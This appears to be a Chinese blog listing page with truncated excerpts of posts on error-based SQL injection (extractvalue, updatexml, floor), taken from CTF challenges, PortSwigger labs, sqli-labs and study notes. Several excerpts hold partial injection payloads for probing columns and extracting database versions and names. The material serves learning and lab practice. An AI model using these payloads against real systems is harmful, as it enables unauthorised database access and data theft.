• 2024-07-047.2.SQL注入-基于函数报错extractvalue(),floor()
    注入基于函数报错extractvalue(),floor()-字符型基于extractvalue()爆出数据库版本payload语句:kobe'andextractvalue(0,concat(0x7e,version()))#爆出数据库版本基于floor()floor()函数就是取整数爆出数据版本信息kobe'and(select2from(selectcount(*),
  • 2024-02-03[SWPUCTF 2021 新生赛]easy_sql
    手工sql注入流程首先,检查字段数url?wllm=1'orderby3--+尝试到4的时候报错,故字段数为3爆库名url?wllm=1'unionselect1,extractvalue(1,concat('~',(selectdatabase()))),3--+爆表名url/?wllm=1'unionselect1,extractvalue(1,concat('~',(selectgro
  • 2023-08-18burpsuite靶场----SQL注入16----DNS外带test
    burpsuite靶场----SQL注入16----oracle之DNS外带test靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band正式开始1.先在burpsuite自带的dns上获取一段url2.使用payload'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+enc
  • 2023-08-18[SWPUCTF 2021 新生赛]error
    [SWPUCTF2021新生赛]error题目来源:nssctf题目类型:web涉及考点:SQL注入1.题目给了一个输入框,随便传点东西通过上面三次传入,我们可以判断闭合类型为单引号闭合发现没有回显位,但有报错提示,因此尝试报错注入2.extractValue()报错注入爆库名1'unionselect1,ext
  • 2023-04-08基于墨者靶场报错盲注分析SQL注入之报错盲注
    报错注入是利用了数据库的某些机制,人为的制造错误条件,是的查询结果能够出现在错误信息中。有xpath语法错误xpath语法错误利用xpath语法错误进行报错注入时利用了extractvlue与updatexml两个函数。使用条件:nysql版本大于5.1.5extractvalue函数原型:extractvalue(xml_document,Xpath
  • 2023-01-02Less18
    Less18用户代理了解步骤1.(1)查看源码发现对账号和密码很难处理(2)审计代码,发现可以对用户代理进行操作,可插入'$uagent','$IP',$uname.(3)使用Burpsuite抓包获取
  • 2022-10-03学习笔记-SQL报错注入
    报错注入的前提条件:Wed应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上后台未对一些具有报错功能的函数(extractvalue,updataxml)过滤Xpath